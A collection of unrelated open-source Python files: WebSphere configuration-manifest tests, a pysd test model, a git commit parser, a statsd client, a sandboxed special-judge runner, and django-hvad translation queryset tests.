            '/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s'
            '/JavaProcessDef:/JavaVirtualMachine:'
            '/Property:com.ibm.security.jgss.debug/'
            % topology
        )
        self.assertEquals(len(prop), 1)
        importConfigurationManifest(
            'wdrtest/manifests/removal/jvm_property.wdrc', topology
        )
        prop = getid(
            '/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s'
            '/JavaProcessDef:/JavaVirtualMachine:'
            '/Property:com.ibm.security.jgss.debug/'
            % topology
        )
        self.assertEquals(len(prop), 0)

    def testMailTransportProtocol(self):
        """Removing reference from MailSession.mailTransportProtocol"""
        smtpProtocol = getid1(
            '/Cell:%(cellName)s/MailProvider:Built-in Mail Provider/'
            % topology
        ).lookup1(
            'ProtocolProvider',
            {
                'protocol': 'smtp',
            },
            'protocolProviders'
        )
        # First manifest sets the reference ...
        importConfigurationManifest(
            'wdrtest/manifests/removal/mail_protocol_provider.wdrc', topology
        )
        mailSession = getid1(
            '/Cell:%(cellName)s'
            '/MailProvider:Built-in Mail Provider'
            '/MailSession:test mail session/'
            % topology
        )
        self.assertEquals(
            str(mailSession.mailTransportProtocol), str(smtpProtocol)
        )
        # ... second manifest clears it again.
        importConfigurationManifest(
            'wdrtest/manifests/removal/mail_protocol_provider2.wdrc', topology
        )
        self.assertNone(mailSession.mailTransportProtocol)

    def testDependentService(self):
        """Removing one of CustomService.prerequisiteServices references"""
        importConfigurationManifest(
            'wdrtest/manifests/removal/dependent_service.wdrc', topology
        )
        importConfigurationManifest(
            'wdrtest/manifests/removal/dependent_service2.wdrc', topology
        )
        server = getid1(
            '/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s/'
            % topology
        )
        referenceList = server.lookup1(
            'CustomService',
            {
                'displayName': 'with dependencies',
            },
            'customServices'
        ).prerequisiteServices
        self.assertEquals(len(referenceList), 2)
        self.assertEquals(referenceList[0].displayName, 'first')
        self.assertEquals(referenceList[1].displayName, 'fifth')
class CustomizeTest(AbstractConfigTest):
    """Customize-mode manifests: modify existing objects only, never create."""

    def testJvmProperty(self):
        """Customize existing Property in JavaVirtualMachine.systemProperties"""
        prop = getid(
            '/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s'
            '/JavaProcessDef:/JavaVirtualMachine:'
            '/Property:com.ibm.security.jgss.debug/'
            % topology
        )
        self.assertEquals(len(prop), 1)
        self.assertEquals(prop[0].value, 'off')
        importConfigurationManifest(
            'wdrtest/manifests/customize/jvm_property.wdrc', topology
        )
        prop = getid(
            '/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s'
            '/JavaProcessDef:/JavaVirtualMachine:'
            '/Property:com.ibm.security.jgss.debug/'
            % topology
        )
        self.assertEquals(len(prop), 1)
        self.assertEquals(prop[0].value, 'on')

    def testMissingJvmProperty(self):
        """Customize missing Property in JavaVirtualMachine.systemProperties"""
        prop = getid(
            '/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s'
            '/JavaProcessDef:/JavaVirtualMachine:'
            '/Property:com.ibm.security.jgss.debug/'
            % topology
        )
        self.assertEquals(len(prop), 1)
        prop[0].remove()
        importConfigurationManifest(
            'wdrtest/manifests/customize/jvm_property.wdrc', topology
        )
        prop = getid(
            '/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s'
            '/JavaProcessDef:/JavaVirtualMachine:'
            '/Property:com.ibm.security.jgss.debug/'
            % topology
        )
        # Customize mode must NOT re-create the removed property.
        self.assertEquals(len(prop), 0)

    def testExistingDataSource(self):
        """Customize existing DataSource's attributes"""
        dataSource = getid1(
            '/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s'
            '/JDBCProvider:Derby JDBC Provider'
            '/DataSource:Default Datasource/'
            % topology
        )
        self.assertEquals(dataSource.jndiName, 'DefaultDatasource')
        importConfigurationManifest(
            'wdrtest/manifests/customize/data_source.wdrc', topology
        )
        self.assertEquals(dataSource.jndiName, 'DefaultDatasource_WDR')

    def testNonexistentDataSource(self):
        """Customize missing DataSource"""
        provider = getid1(
            '/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s'
            '/JDBCProvider:Derby JDBC Provider/'
            % topology
        )
        dataSource = getid1(
            '/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s'
            '/JDBCProvider:Derby JDBC Provider'
            '/DataSource:Default Datasource/'
            % topology
        )
        self.assertEquals(dataSource.jndiName, 'DefaultDatasource')
        self.assertEquals(
            provider.description, 'Derby embedded non-XA JDBC Provider'
        )
        dataSource.remove()
        importConfigurationManifest(
            'wdrtest/manifests/customize/data_source.wdrc', topology
        )
        dataSources = getid(
            '/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s'
            '/JDBCProvider:Derby JDBC Provider'
            '/DataSource:Default Datasource/'
            % topology
        )
        self.assertEquals(len(dataSources), 1)
        self.assertEquals(dataSources[0].jndiName, 'DefaultDatasource_WDR')
        self.assertEquals(
            provider.description, 'customized'
        )

    def testNonexistentProvider(self):
        """Customize missing DataSource"""
        provider = getid1(
            '/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s'
            '/JDBCProvider:Derby JDBC Provider/'
            % topology
        )
        dataSource = getid1(
            '/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s'
            '/JDBCProvider:Derby JDBC Provider'
            '/DataSource:Default Datasource/'
            % topology
        )
        self.assertEquals(dataSource.jndiName, 'DefaultDatasource')
        provider.remove()
        importConfigurationManifest(
            'wdrtest/manifests/customize/data_source.wdrc', topology
        )
        # Neither the provider nor its data source reappears.
        providers = getid(
            '/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s'
            '/JDBCProvider:Derby JDBC Provider/'
            % topology
        )
        self.assertEquals(providers, [])
        dataSources = getid(
            '/Cell:%(cellName)s/Node:%(nodeName)s/Server:%(serverName)s'
            '/JDBCProvider:Derby JDBC Provider'
            '/DataSource:Default Datasource/'
            % topology
        )
        self.assertEquals(dataSources, [])
class TemplatesTest(AbstractConfigTest):
    """Manifests that create objects from named configuration templates."""

    def test_db2_ibm_jcc_xa(self):
        """Create a JDBCProvider from a template referenced by name."""
        providers = getid(
            '/Cell:%(cellName)s/Node:%(nodeName)s/JDBCProvider:/'
            % topology
        )
        self.assertEquals(providers, [])
        importConfigurationManifest(
            'wdrtest/manifests/templates/db2_ibm_jcc_xa.wdrc', topology
        )
        providers = getid(
            '/Cell:%(cellName)s/Node:%(nodeName)s/JDBCProvider:/'
            % topology
        )
        self.assertEquals(len(providers), 1)
        db2provider = providers[0]
        self.assertEquals(
            db2provider.name,
            'Template based provider'
        )
        self.assertEquals(
            db2provider.description,
            'Created from "DB2 Using IBM JCC Driver (XA)" template'
        )
        self.assertEquals(
            db2provider.providerType, 'DB2 Using IBM JCC Driver (XA)'
        )
        self.assertTrue(db2provider.xa)

    def test_db2_ibm_jcc_xa_using_full_id(self):
        """Create a JDBCProvider from a template referenced by full id."""
        providers = getid(
            '/Cell:%(cellName)s/Node:%(nodeName)s/JDBCProvider:/'
            % topology
        )
        self.assertEquals(providers, [])
        importConfigurationManifest(
            'wdrtest/manifests/templates/db2_ibm_jcc_xa_using_full_id.wdrc',
            topology
        )
        providers = getid(
            '/Cell:%(cellName)s/Node:%(nodeName)s/JDBCProvider:/'
            % topology
        )
        self.assertEquals(len(providers), 1)
        db2provider = providers[0]
        self.assertEquals(
            db2provider.name,
            'Template based provider'
        )
        self.assertEquals(
            db2provider.description,
            'Created from "DB2 Using IBM JCC Driver (XA)" template'
        )
        self.assertEquals(
            db2provider.providerType, 'DB2 Using IBM JCC Driver (XA)'
        )
        self.assertTrue(db2provider.xa)

    def test_non_unique_template(self):
        """An ambiguous template name must raise."""
        try:
            importConfigurationManifest(
                'wdrtest/manifests/templates/non_unique_template.wdrc',
                topology
            )
        except:
            return
        self.fail('non-unique template name should raise exception')

    def test_web_server(self):
        """Create a server from the default server template."""
        self.assertEqual(0, len(getid('/Server:DefaultServerFromTemplate/')))
        importConfigurationManifest(
            'wdrtest/manifests/templates/default_server.wdrc',
            topology
        )
        self.assertEqual(1, len(getid('/Server:DefaultServerFromTemplate/')))

    def test_non_existent_template(self):
        """An unknown template name must raise."""
        try:
            importConfigurationManifest(
                'wdrtest/manifests/templates/non_existent_template.wdrc',
                topology
            )
        except:
            return
        # Bug fix: the failure message was copy-pasted from
        # test_non_unique_template and claimed "non-unique" here.
        self.fail('non-existent template name should raise exception')
|
data/JamesPHoughton/pysd/tests/test-models-master/tests/exp/test_exp.py
|
from __future__ import division
import numpy as np
from pysd import functions
def time():
    # Current simulation time; _t is a module-level state variable
    # maintained by the pysd runtime -- TODO confirm against the runner.
    return _t
def flowa():
    """Constant inflow rate feeding stocka.

    Type: Flow or Auxiliary
    """
    rate = 0.1
    return rate
def stocka():
    # Current value of the stock, read from the pysd integration state.
    return _state['stocka']
def _stocka_init():
    # Initial value of the stocka integration state.
    return -5
def _dstocka_dt():
    # Net rate of change of stocka: its only inflow is flowa.
    return flowa()
def test_exp():
    """
    Type: Flow or Auxiliary
    """
    # Exponential of the stock -- the model output under test.
    return np.exp(stocka())
def final_time():
    """Simulation stop time.

    Type: Flow or Auxiliary
    """
    stop_time = 100
    return stop_time
def initial_time():
    """Simulation start time.

    Type: Flow or Auxiliary
    """
    start_time = 0
    return start_time
def saveper():
    """
    Type: Flow or Auxiliary
    """
    # Save results every integration time step.
    return time_step()
def time_step():
    """Integration time step, in model time units.

    Type: Flow or Auxiliary
    """
    return 1
|
data/Yelp/git-code-debt/git_code_debt/repo_parser.py
|
from __future__ import absolute_import
from __future__ import unicode_literals
import collections
import contextlib
import shutil
import subprocess
import tempfile
from git_code_debt.util.iter import chunk_iter
from git_code_debt.util.subprocess import cmd_output
# A single commit: its sha and commit timestamp (seconds since the epoch).
Commit = collections.namedtuple('Commit', ['sha', 'date'])
# git pretty-format: commit hash (%H), newline, committer timestamp (%ct).
COMMIT_FORMAT = '--format=%H%n%ct'
class RepoParser(object):
    """Extracts commit history information from a git repository.

    The repository is cloned (``--no-checkout --shared``) into a temporary
    directory for the duration of the :meth:`repo_checked_out` context;
    all other methods assume that context is active.
    """

    def __init__(self, git_repo):
        # Path/URL of the repository; tempdir is non-None only while inside
        # the repo_checked_out() context.
        self.git_repo = git_repo
        self.tempdir = None

    @contextlib.contextmanager
    def repo_checked_out(self):
        """Clone the repo into a fresh temp dir; always remove it on exit."""
        assert not self.tempdir
        self.tempdir = tempfile.mkdtemp(suffix='temp-repo')
        try:
            subprocess.check_call(
                (
                    'git', 'clone',
                    '--no-checkout', '--shared',
                    self.git_repo, self.tempdir,
                ),
                stdout=None,
            )
            yield
        finally:
            shutil.rmtree(self.tempdir)
            self.tempdir = None

    def get_commit(self, sha):
        """Return a :class:`Commit` for *sha* via ``git show``."""
        shown = cmd_output(
            'git', 'show', COMMIT_FORMAT, sha,
            cwd=self.tempdir,
        )
        # First line is the hash, second the committer timestamp.
        commit_sha, timestamp = shown.splitlines()[:2]
        return Commit(commit_sha, int(timestamp))

    def get_commits(self, since_sha=None):
        """Returns a list of Commit objects.

        Args:
            since_sha - (optional) A sha to search from
        """
        assert self.tempdir
        argv = ['git', 'log', '--first-parent', '--reverse', COMMIT_FORMAT]
        if since_sha:
            # Include the starting commit itself, then log everything after it.
            found = [self.get_commit(since_sha)]
            argv.append('{0}..HEAD'.format(since_sha))
        else:
            found = []
            argv.append('HEAD')
        log_output = cmd_output(*argv, cwd=self.tempdir)
        # The log alternates sha / timestamp lines; consume them pairwise.
        for commit_sha, timestamp in chunk_iter(log_output.splitlines(), 2):
            found.append(Commit(commit_sha, int(timestamp)))
        return found

    def get_original_commit(self, sha):
        """Return the raw (undecoded, ``encoding=None``) ``git show`` output."""
        assert self.tempdir
        return cmd_output(
            'git', 'show', sha, cwd=self.tempdir, encoding=None,
        )

    def get_commit_diff(self, previous_sha, sha):
        """Return the raw (undecoded) diff between *previous_sha* and *sha*."""
        assert self.tempdir
        return cmd_output(
            'git', 'diff', previous_sha, sha, cwd=self.tempdir, encoding=None,
        )
|
data/WoLpH/python-statsd/statsd/client.py
|
import logging
import statsd
from . import compat
class Client(object):
    '''Statsd Client Object

    :keyword name: The name for this client
    :type name: str
    :keyword connection: The connection to use, will be automatically created if
        not given
    :type connection: :class:`~statsd.connection.Connection`

    >>> client = Client('test')
    >>> client
    <Client:test@<Connection[localhost:8125] P(1.0)>>
    >>> client.get_client('spam')
    <Client:test.spam@<Connection[localhost:8125] P(1.0)>>
    '''

    # Class-level defaults; instances overwrite both in __init__.
    name = None
    connection = None

    def __init__(self, name, connection=None):
        self.name = self._get_name(name)
        # Lazily build a default connection only when none was supplied.
        self.connection = connection or statsd.Connection()
        self.logger = logging.getLogger(
            '%s.%s' % (__name__, self.__class__.__name__))

    @classmethod
    def _get_name(cls, *name_parts):
        # Drop empty parts, coerce the rest to str and dot-join them.
        return '.'.join(compat.to_str(part) for part in name_parts if part)

    def get_client(self, name=None, class_=None):
        '''Get a (sub-)client with a separate namespace

        This way you can create a global/app based client with subclients
        per class/function

        :keyword name: The name to use, if the name for this client was `spam`
            and the `name` argument is `eggs` than the resulting name will be
            `spam.eggs`
        :type name: str
        :keyword class_: The :class:`~statsd.client.Client` subclass to use
            (e.g. :class:`~statsd.timer.Timer` or
            :class:`~statsd.counter.Counter`)
        :type class_: :class:`~statsd.client.Client`
        '''
        # Default to this client's own class so subclasses stay subclassed.
        klass = class_ or self.__class__
        return klass(
            name=self._get_name(self.name, name),
            connection=self.connection,
        )

    def get_average(self, name=None):
        '''Shortcut for getting an :class:`~statsd.average.Average` instance

        :keyword name: See :func:`~statsd.client.Client.get_client`
        :type name: str
        '''
        return self.get_client(name=name, class_=statsd.Average)

    def get_counter(self, name=None):
        '''Shortcut for getting a :class:`~statsd.counter.Counter` instance

        :keyword name: See :func:`~statsd.client.Client.get_client`
        :type name: str
        '''
        return self.get_client(name=name, class_=statsd.Counter)

    def get_gauge(self, name=None):
        '''Shortcut for getting a :class:`~statsd.gauge.Gauge` instance

        :keyword name: See :func:`~statsd.client.Client.get_client`
        :type name: str
        '''
        return self.get_client(name=name, class_=statsd.Gauge)

    def get_raw(self, name=None):
        '''Shortcut for getting a :class:`~statsd.raw.Raw` instance

        :keyword name: See :func:`~statsd.client.Client.get_client`
        :type name: str
        '''
        return self.get_client(name=name, class_=statsd.Raw)

    def get_timer(self, name=None):
        '''Shortcut for getting a :class:`~statsd.timer.Timer` instance

        :keyword name: See :func:`~statsd.client.Client.get_client`
        :type name: str
        '''
        return self.get_client(name=name, class_=statsd.Timer)

    def __repr__(self):
        return '<%s:%s@%r>' % (
            self.__class__.__name__, self.name, self.connection)

    def _send(self, data):
        # All traffic funnels through the shared connection object.
        return self.connection.send(data)
|
data/QingdaoU/OnlineJudge/judge/spj_client.py
|
import os
import judger
# Special-judge verdicts: the SPJ binary reports its result via exit status.
WA = 1
AC = 0
SPJ_ERROR = -1
def file_exists(path):
    """Return True when *path* exists on the filesystem."""
    return os.path.exists(path)
def spj(path, max_cpu_time, max_memory, in_path, user_out_path):
    """Run the special-judge binary in the sandbox and normalise its verdict.

    The judger result dict gains a ``spj_result`` key: the SPJ's exit status
    when it terminated cleanly with a recognised verdict, else SPJ_ERROR.

    Raises ValueError when either input file is missing.
    """
    # Guard clause: refuse to run against missing input/output files.
    if not (file_exists(in_path) and file_exists(user_out_path)):
        raise ValueError("in_path or user_out_path does not exist")
    result = judger.run(path=path, in_file=in_path, out_file="/tmp/spj.out",
                        max_cpu_time=max_cpu_time, max_memory=max_memory,
                        args=[in_path, user_out_path], env=["PATH=" + os.environ.get("PATH", "")],
                        use_sandbox=True, use_nobody=True)
    # Only trust the exit status if the SPJ was not killed by a signal and
    # returned one of the recognised verdict codes.
    if result["signal"] == 0 and result["exit_status"] in [AC, WA, SPJ_ERROR]:
        result["spj_result"] = result["exit_status"]
    else:
        result["spj_result"] = SPJ_ERROR
    return result
|
data/KristianOellegaard/django-hvad/hvad/tests/query.py
|
import django
from django.db import connection
from django.db.models import Count
from django.db.models.query_utils import Q
from django.utils import translation
from hvad.test_utils.data import NORMAL, STANDARD
from hvad.test_utils.testcase import HvadTestCase, minimumDjangoVersion
from hvad.test_utils.project.app.models import Normal, AggregateModel, Standard, SimpleRelated
from hvad.test_utils.fixtures import NormalFixture, StandardFixture
class FilterTests(HvadTestCase, NormalFixture):
    """Filtering translation-aware querysets.

    Covers filters on shared and translated fields, fallbacks, the special
    'all' language and language resolution deferred to iteration time.
    Query counts asserted below are part of the contract under test.
    """
    normal_count = 2
    def test_simple_filter(self):
        # Shared-field filter still only yields the active language's translation.
        qs = Normal.objects.language('en').filter(shared_field__contains='2')
        self.assertEqual(qs.count(), 1)
        obj = qs[0]
        self.assertEqual(obj.shared_field, NORMAL[2].shared_field)
        self.assertEqual(obj.translated_field, NORMAL[2].translated_field['en'])
        qs = Normal.objects.language('ja').filter(shared_field__contains='1')
        self.assertEqual(qs.count(), 1)
        obj = qs[0]
        self.assertEqual(obj.shared_field, NORMAL[1].shared_field)
        self.assertEqual(obj.translated_field, NORMAL[1].translated_field['ja'])
    def test_translated_filter(self):
        qs = Normal.objects.language('en').filter(translated_field__contains='English')
        self.assertEqual(qs.count(), self.normal_count)
        obj1, obj2 = qs
        self.assertEqual(obj1.shared_field, NORMAL[1].shared_field)
        self.assertEqual(obj1.translated_field, NORMAL[1].translated_field['en'])
        self.assertEqual(obj2.shared_field, NORMAL[2].shared_field)
        self.assertEqual(obj2.translated_field, NORMAL[2].translated_field['en'])
    def test_fallbacks_filter(self):
        # Remove one English translation so the queryset must fall back to
        # another language for that object.
        (Normal.objects.language('en')
            .filter(shared_field=NORMAL[1].shared_field)
            .delete_translations())
        with translation.override('en'):
            qs = Normal.objects.language().fallbacks()
            with self.assertNumQueries(2):
                self.assertEqual(qs.count(), self.normal_count)
                self.assertEqual(len(qs), self.normal_count)
            # Once evaluated, the cached queryset must not hit the DB again.
            with self.assertNumQueries(0):
                self.assertCountEqual((obj.pk for obj in qs), tuple(self.normal_id.values()))
                self.assertCountEqual((obj.language_code for obj in qs), self.translations)
    def test_all_languages_filter(self):
        with self.assertNumQueries(2):
            qs = Normal.objects.language('all').filter(shared_field__contains='Shared')
            self.assertEqual(qs.count(), self.normal_count * len(self.translations))
            self.assertCountEqual((obj.shared_field for obj in qs),
                                  (NORMAL[1].shared_field,
                                   NORMAL[2].shared_field) * 2)
            self.assertCountEqual((obj.translated_field for obj in qs),
                                  (NORMAL[1].translated_field['en'],
                                   NORMAL[1].translated_field['ja'],
                                   NORMAL[2].translated_field['en'],
                                   NORMAL[2].translated_field['ja']))
        with self.assertNumQueries(2):
            qs = Normal.objects.language('all').filter(translated_field__contains='English')
            self.assertEqual(qs.count(), self.normal_count)
            self.assertCountEqual((obj.shared_field for obj in qs),
                                  (NORMAL[1].shared_field,
                                   NORMAL[2].shared_field))
            self.assertCountEqual((obj.translated_field for obj in qs),
                                  (NORMAL[1].translated_field['en'],
                                   NORMAL[2].translated_field['en']))
        with self.assertNumQueries(2):
            qs = Normal.objects.language('all').filter(translated_field__contains='1')
            self.assertEqual(qs.count(), 1)
            obj = qs[0]
            self.assertEqual(obj.shared_field, NORMAL[1].shared_field)
            self.assertEqual(obj.translated_field, NORMAL[1].translated_field['en'])
    def test_deferred_language_filter(self):
        # Language is resolved at evaluation time, not queryset-creation time.
        with translation.override('ja'):
            qs = Normal.objects.language().filter(translated_field__contains='English')
        with translation.override('en'):
            self.assertEqual(qs.count(), self.normal_count)
            obj1, obj2 = qs
            self.assertEqual(obj1.shared_field, NORMAL[1].shared_field)
            self.assertEqual(obj1.translated_field, NORMAL[1].translated_field['en'])
            self.assertEqual(obj2.shared_field, NORMAL[2].shared_field)
            self.assertEqual(obj2.translated_field, NORMAL[2].translated_field['en'])
class ExtraTests(HvadTestCase, NormalFixture):
    """``extra()`` support on translation-aware querysets."""
    normal_count = 2
    def test_simple_extra(self):
        # An extra select expression must survive the translation join.
        qs = Normal.objects.language('en').extra(select={'test_extra': '2 + 2'})
        self.assertEqual(qs.count(), self.normal_count)
        self.assertEqual(int(qs[0].test_extra), 4)
class QueryCachingTests(HvadTestCase, NormalFixture):
    """Result-cache behaviour: once evaluated, no method may hit the DB."""
    normal_count = 2
    def _try_all_cache_using_methods(self, qs, length):
        # Helper: every cache-consuming operation on an already-evaluated
        # queryset must execute zero queries.
        with self.assertNumQueries(0):
            x = 0
            for obj in qs: x += 1
            self.assertEqual(x, length)
        with self.assertNumQueries(0):
            qs[0]
        with self.assertNumQueries(0):
            self.assertEqual(qs.exists(), length != 0)
        with self.assertNumQueries(0):
            self.assertEqual(qs.count(), length)
        with self.assertNumQueries(0):
            self.assertEqual(len(qs), length)
        with self.assertNumQueries(0):
            self.assertEqual(bool(qs), length != 0)
    def test_iter_caches(self):
        with translation.override('en'):
            index = 0
            qs = Normal.objects.language().filter(pk=self.normal_id[1])
            for obj in qs:
                index += 1
            self.assertEqual(index, 1)
            self._try_all_cache_using_methods(qs, 1)
    def test_pickling_caches(self):
        import pickle
        with translation.override('en'):
            qs = Normal.objects.language().filter(pk=self.normal_id[1])
            # Pickling forces evaluation, populating the result cache.
            pickle.dumps(qs)
            self._try_all_cache_using_methods(qs, 1)
    def test_len_caches(self):
        with translation.override('en'):
            qs = Normal.objects.language().filter(pk=self.normal_id[1])
            self.assertEqual(len(qs), 1)
            self._try_all_cache_using_methods(qs, 1)
    def test_bool_caches(self):
        with translation.override('en'):
            qs = Normal.objects.language().filter(pk=self.normal_id[1])
            self.assertTrue(qs)
            self._try_all_cache_using_methods(qs, 1)
class IterTests(HvadTestCase, NormalFixture):
    """Iteration over translation-aware querysets."""
    normal_count = 2
    def test_simple_iter(self):
        # A full iteration must cost exactly one query per language.
        with translation.override('en'):
            with self.assertNumQueries(1):
                for index, obj in enumerate(Normal.objects.language(), 1):
                    self.assertEqual(obj.shared_field, NORMAL[index].shared_field)
                    self.assertEqual(obj.translated_field, NORMAL[index].translated_field['en'])
        with translation.override('ja'):
            with self.assertNumQueries(1):
                for index, obj in enumerate(Normal.objects.language(), 1):
                    self.assertEqual(obj.shared_field, NORMAL[index].shared_field)
                    self.assertEqual(obj.translated_field, NORMAL[index].translated_field['ja'])
    def test_iter_unique_reply(self):
        # No duplicate rows from the shared/translation join.
        with translation.override('en'):
            self.assertEqual(len(Normal.objects.all()), len(Normal.objects.untranslated()))
    def test_iter_deferred_language(self):
        # The language active at iteration time wins, not at creation time.
        with translation.override('en'):
            qs = Normal.objects.language()
        with translation.override('ja'):
            for index, obj in enumerate(qs, 1):
                self.assertEqual(obj.shared_field, NORMAL[index].shared_field)
                self.assertEqual(obj.translated_field, NORMAL[index].translated_field['ja'])
class UpdateTests(HvadTestCase, NormalFixture):
    """``update()`` semantics: shared-field updates affect every language,
    translated-field updates only the active one. Query counts depend on
    whether the backend allows an UPDATE to self-select.
    """
    normal_count = 2
    def test_update_shared(self):
        NEW_SHARED = 'new shared'
        n1 = Normal.objects.language('en').get(pk=self.normal_id[1])
        n2 = Normal.objects.language('en').get(pk=self.normal_id[2])
        ja1 = Normal.objects.language('ja').get(pk=self.normal_id[1])
        ja2 = Normal.objects.language('ja').get(pk=self.normal_id[2])
        with self.assertNumQueries(1 if connection.features.update_can_self_select else 2):
            Normal.objects.language('en').update(shared_field=NEW_SHARED)
        new1 = Normal.objects.language('en').get(pk=self.normal_id[1])
        new2 = Normal.objects.language('en').get(pk=self.normal_id[2])
        self.assertEqual(new1.shared_field, NEW_SHARED)
        self.assertEqual(new1.translated_field, n1.translated_field)
        self.assertEqual(new2.shared_field, NEW_SHARED)
        self.assertEqual(new2.translated_field, n2.translated_field)
        # The shared field changes for ALL languages, translations untouched.
        newja1 = Normal.objects.language('ja').get(pk=self.normal_id[1])
        newja2 = Normal.objects.language('ja').get(pk=self.normal_id[2])
        self.assertEqual(newja1.shared_field, NEW_SHARED)
        self.assertEqual(newja2.shared_field, NEW_SHARED)
        self.assertEqual(newja1.translated_field, ja1.translated_field)
        self.assertEqual(newja2.translated_field, ja2.translated_field)
    def test_update_translated(self):
        NEW_TRANSLATED = 'new translated'
        n1 = Normal.objects.language('en').get(pk=self.normal_id[1])
        n2 = Normal.objects.language('en').get(pk=self.normal_id[2])
        ja1 = Normal.objects.language('ja').get(pk=self.normal_id[1])
        ja2 = Normal.objects.language('ja').get(pk=self.normal_id[2])
        with self.assertNumQueries(1):
            Normal.objects.language('en').update(translated_field=NEW_TRANSLATED)
        new1 = Normal.objects.language('en').get(pk=self.normal_id[1])
        new2 = Normal.objects.language('en').get(pk=self.normal_id[2])
        self.assertEqual(new1.shared_field, n1.shared_field)
        self.assertEqual(new2.shared_field, n2.shared_field)
        self.assertEqual(new1.translated_field, NEW_TRANSLATED)
        self.assertEqual(new2.translated_field, NEW_TRANSLATED)
        # Other languages must be completely unaffected.
        newja1 = Normal.objects.language('ja').get(pk=self.normal_id[1])
        newja2 = Normal.objects.language('ja').get(pk=self.normal_id[2])
        self.assertEqual(newja1.shared_field, ja1.shared_field)
        self.assertEqual(newja2.shared_field, ja2.shared_field)
        self.assertEqual(newja1.translated_field, ja1.translated_field)
        self.assertEqual(newja2.translated_field, ja2.translated_field)
    def test_update_mixed(self):
        NEW_SHARED = 'new shared'
        NEW_TRANSLATED = 'new translated'
        ja1 = Normal.objects.language('ja').get(pk=self.normal_id[1])
        ja2 = Normal.objects.language('ja').get(pk=self.normal_id[2])
        # Mixed update needs one statement per model (shared + translations).
        with self.assertNumQueries(2 if connection.features.update_can_self_select else 3):
            Normal.objects.language('en').update(
                shared_field=NEW_SHARED, translated_field=NEW_TRANSLATED
            )
        new1 = Normal.objects.language('en').get(pk=self.normal_id[1])
        new2 = Normal.objects.language('en').get(pk=self.normal_id[2])
        self.assertEqual(new1.shared_field, NEW_SHARED)
        self.assertEqual(new1.translated_field, NEW_TRANSLATED)
        self.assertEqual(new2.shared_field, NEW_SHARED)
        self.assertEqual(new2.translated_field, NEW_TRANSLATED)
        newja1 = Normal.objects.language('ja').get(pk=self.normal_id[1])
        newja2 = Normal.objects.language('ja').get(pk=self.normal_id[2])
        self.assertEqual(newja1.shared_field, NEW_SHARED)
        self.assertEqual(newja2.shared_field, NEW_SHARED)
        self.assertEqual(newja1.translated_field, ja1.translated_field)
        self.assertEqual(newja2.translated_field, ja2.translated_field)
    def test_update_deferred_language(self):
        NEW_TRANSLATED = 'new translated'
        n1 = Normal.objects.language('en').get(pk=self.normal_id[1])
        n2 = Normal.objects.language('en').get(pk=self.normal_id[2])
        ja1 = Normal.objects.language('ja').get(pk=self.normal_id[1])
        ja2 = Normal.objects.language('ja').get(pk=self.normal_id[2])
        # Language is resolved when update() runs, not when the qs was built.
        with translation.override('ja'):
            qs = Normal.objects.language()
        with translation.override('en'):
            with self.assertNumQueries(1):
                qs.update(translated_field=NEW_TRANSLATED)
        new1 = Normal.objects.language('en').get(pk=self.normal_id[1])
        new2 = Normal.objects.language('en').get(pk=self.normal_id[2])
        self.assertEqual(new1.shared_field, n1.shared_field)
        self.assertEqual(new2.shared_field, n2.shared_field)
        self.assertEqual(new1.translated_field, NEW_TRANSLATED)
        self.assertEqual(new2.translated_field, NEW_TRANSLATED)
        newja1 = Normal.objects.language('ja').get(pk=self.normal_id[1])
        newja2 = Normal.objects.language('ja').get(pk=self.normal_id[2])
        self.assertEqual(newja1.shared_field, ja1.shared_field)
        self.assertEqual(newja2.shared_field, ja2.shared_field)
        self.assertEqual(newja1.translated_field, ja1.translated_field)
        self.assertEqual(newja2.translated_field, ja2.translated_field)
    def test_update_fallbacks(self):
        qs = Normal.objects.language().fallbacks()
        with self.assertNumQueries(1 if connection.features.update_can_self_select else 2):
            qs.filter(shared_field=NORMAL[1].shared_field).update(shared_field='updated')
        self.assertEqual(Normal.objects.language('ja').get(shared_field='updated').pk, self.normal_id[1])
        self.assertEqual(Normal.objects.language('en').get(shared_field='updated').pk, self.normal_id[1])
class ValuesListTests(HvadTestCase, NormalFixture):
    """``values_list()`` over shared and translated fields."""
    normal_count = 2
    def test_values_list_translated(self):
        values = Normal.objects.language('en').values_list('translated_field', flat=True)
        values_list = list(values)
        self.assertCountEqual(values_list, [NORMAL[1].translated_field['en'],
                                            NORMAL[2].translated_field['en']])
    def test_values_list_shared(self):
        values = Normal.objects.language('en').values_list('shared_field', flat=True)
        values_list = list(values)
        self.assertCountEqual(values_list, [NORMAL[1].shared_field,
                                            NORMAL[2].shared_field])
    def test_values_list_mixed(self):
        values = Normal.objects.language('en').values_list('shared_field', 'translated_field')
        values_list = list(values)
        check = [
            (NORMAL[1].shared_field, NORMAL[1].translated_field['en']),
            (NORMAL[2].shared_field, NORMAL[2].translated_field['en']),
        ]
        self.assertCountEqual(values_list, check)
    def test_values_list_deferred_language(self):
        # The active language at evaluation time determines the translations.
        with translation.override('ja'):
            qs = Normal.objects.language()
        with translation.override('en'):
            values = qs.values_list('shared_field', 'translated_field')
            values_list = list(values)
        check = [
            (NORMAL[1].shared_field, NORMAL[1].translated_field['en']),
            (NORMAL[2].shared_field, NORMAL[2].translated_field['en']),
        ]
        self.assertCountEqual(values_list, check)
    def test_values_list_language_all(self):
        # 'all' yields one row per translation of the matched object.
        values = (Normal.objects.language('all').filter(shared_field=NORMAL[1].shared_field)
                  .values_list('shared_field', 'translated_field'))
        values_list = list(values)
        check = [
            (NORMAL[1].shared_field, NORMAL[1].translated_field['ja']),
            (NORMAL[1].shared_field, NORMAL[1].translated_field['en']),
        ]
        self.assertCountEqual(values_list, check)
class ValuesTests(HvadTestCase, NormalFixture):
    """``values()`` over shared and translated fields."""
    normal_count = 2
    def test_values_shared(self):
